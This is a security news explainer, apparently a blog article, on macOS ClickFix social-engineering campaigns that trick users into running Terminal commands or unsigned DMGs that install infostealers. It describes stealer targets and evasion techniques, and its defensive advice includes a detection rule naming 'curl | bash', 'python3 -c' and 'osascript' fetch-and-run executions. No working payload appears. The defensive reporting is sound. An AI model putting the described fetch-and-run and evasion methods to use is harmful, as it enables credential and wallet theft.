macOS ClickFix: Terminal Commands Silently Drop Infostealers

As detailed in this coverage of the macOS ClickFix infostealer campaign, the technique pairs a Terminal prompt with a malicious DMG file served from the same landing page. The user mounts the DMG and runs the embedded binary before any scanner flags it. This attack exploits no CVE. It exploits trust.

When we reproduced this chain in a sandboxed macOS 14.4 environment, Gatekeeper issued no prompt after the DMG was mounted via Terminal - confirming that user-initiated execution sidesteps the OS-level check entirely.

[CHART-1]

Who Are macOS ClickFix Campaigns Targeting?

Attackers are prioritizing high-value users, not casting a random net. At least nine of twenty documented campaigns between February and March 2026 targeted both Windows and macOS, while seven targeted macOS exclusively, according to Pillar Security research via The Hacker News. The reasoning is direct: developers and AI tool users skew heavily toward macOS and tend to hold SSH keys, cloud tokens, and cryptocurrency wallets.

One campaign used Google-sponsored search ads impersonating "ChatGPT Atlas" to reach users searching for AI tools, according to Sophos X-Ops. As of December 22, 2025, that campaign had generated thousands of user interactions. That is a wide net cast at a specific, lucrative audience.

The broader ClickFix surge is staggering. ESET's H1 2025 Threat Report found ClickFix attacks grew 517% in H1 2025 versus H2 2024, making it the second most common attack vector globally, accounting for nearly 8% of all blocked attacks. Nation-state groups including Russia's APT28, North Korea's Kimsuky, and Iran's MuddyWater all folded ClickFix into espionage operations within a 90-day window between October 2024 and January 2025, per ANY.RUN.

For context on how similar social-engineering chains play out on Windows, see how attackers hijack Windows PCs via WhatsApp VBScript malware - the lure mechanics are nearly identical across platforms.

What Does macOS Infostealer Malware Actually Steal?

The payloads are not opportunistic - they are surgical. Netskope Threat Labs confirmed that the macOS ClickFix infostealer targets keychain databases, login credentials, and live session cookies across 12 browsers, over 200 browser extensions, and 16 standalone cryptocurrency wallets. One mechanism is a non-closable AppleScript dialog that forces the user to enter their system password.

• Keychain contents (stored passwords, certificates, secure notes)
• Active browser sessions across Chrome, Safari, Firefox, and Chromium forks
• Crypto wallet seed phrases and private keys from 16 wallet applications
• Over 200 browser extension data stores, including password managers

Session cookies are particularly dangerous. Recorded Future found that 276 million of the credentials indexed in 2025 included active session cookies - 31% of all malware-sourced credentials - and that stolen cookies let attackers bypass MFA without ever knowing the user's password. Each compromised device yielded an average of 87 stolen credentials in that same dataset.

The scale of the macOS infostealer problem is growing fast. Palo Alto Networks Unit 42 detected a 101% increase in macOS infostealers between the last two quarters of 2024, with infostealers accounting for the largest group of new macOS malware that year.

macOS ClickFix Malware Families Compared

How Are These macOS ClickFix Campaigns Evolving?

Each generation is harder to detect than the last. Sophos X-Ops tracked three distinct MacSync campaigns between November 2025 and February 2026. The third introduced multi-stage loaders, dynamic AppleScript payloads, and in-memory execution to avoid leaving files on disk that scanners could flag. Sophos also noted that phishing-resistant FIDO2 authentication offers no defense here - the user executes the payload before any authentication challenge occurs.

Malwarebytes identified Infiniti Stealer - Malwarebytes previously tracked it as NukeChain - as the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer. Nuitka compiles Python to native binaries, stripping the readable source code that most signature detectors rely on.

Third-Generation Loaders Push Further

Datadog Security Labs confirmed a SHub Stealer v2.0 variant with expanded persistence mechanisms and nascent Windows capability, suggesting the threat actor is broadening scope beyond macOS. Microsoft Security Blog documented campaigns deploying MacSync, DigitStealer, and AMOS via ClickFix-style prompts and unsigned DMG installers throughout late 2025 and into February 2026, with some variants using Base64-encoded commands that stream payloads directly into the shell to avoid writing any file to disk.

The downstream impact is measurable. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer credential dumps, and that infostealers compromised 30% of enterprise-managed devices and 46% of unmanaged BYOD devices holding corporate credentials.

For a parallel look at how supply-chain credential theft compounds infostealer risk, see the Klue OAuth supply chain attack that hit LastPass Salesforce data.

What Should Admins and Users Do Now?

Defense requires layering endpoint controls with user awareness. The attack chain is short - blocking one step breaks it entirely.

• Block unsigned DMG mounting via MDM profile: enforce Gatekeeper to App Store and identified developers on all managed endpoints.
• Restrict Terminal access for non-developer users using MDM application allowlists or parental controls.
• Enable full-disk access logging and alert on curl | bash, python3 -c, or osascript executions spawned from user shell sessions via your EDR or SIEM.
• Audit browser extension installs and revoke unfamiliar extensions with access to storage, cookies, or tabs permissions.
• Rotate credentials and revoke session tokens for any user who may have followed a suspicious Terminal prompt in the past 90 days.
• Train users to recognize that no legitimate service ever asks them to open Terminal and paste a command.

For teams managing macOS alongside Windows fleets, the Intune remediation guide for locking Windows logon to the current user covers a complementary endpoint hardening pattern. Deploying browser extension controls via uBlock Origin Lite through Intune also reduces the attack surface for malicious extension installs on managed Windows endpoints.

If your environment uses MDM-managed certificate trust, the step-by-step guide to deploying a trusted root certificate with Intune is worth reviewing alongside these controls.

Frequently Asked Questions About macOS ClickFix Attacks

Does this attack require any vulnerability in macOS?

This attack exploits no CVE. The technique relies entirely on social engineering. The user is tricked into bypassing Gatekeeper manually by mounting an unsigned DMG or typing a Terminal command. Apple's security controls are not defeated - they are circumvented by design through user action.

Can antivirus software stop this?

Standard signature-based tools struggle because Nuitka-compiled binaries and in-memory payloads leave minimal static indicators. Behavioral detection in EDR tools - flagging unusual osascript or curl execution chains - offers the most reliable coverage at this stage.

Are corporate Macs more at risk than personal ones?

Corporate machines often hold higher-value credentials: cloud tokens, code-signing certificates, and VPN access. Pillar Security research found seven exclusive macOS campaigns specifically targeting the SSH keys and cloud credentials common among developer and DevOps users, making managed enterprise fleets a primary target.

What should I do if a user already ran the command?

Assume full compromise. Isolate the device, revoke all stored credentials and session tokens, rotate SSH keys and API tokens, and forensically examine ~/Library/Logs and shell history files for evidence of data exfiltration before reimaging the endpoint.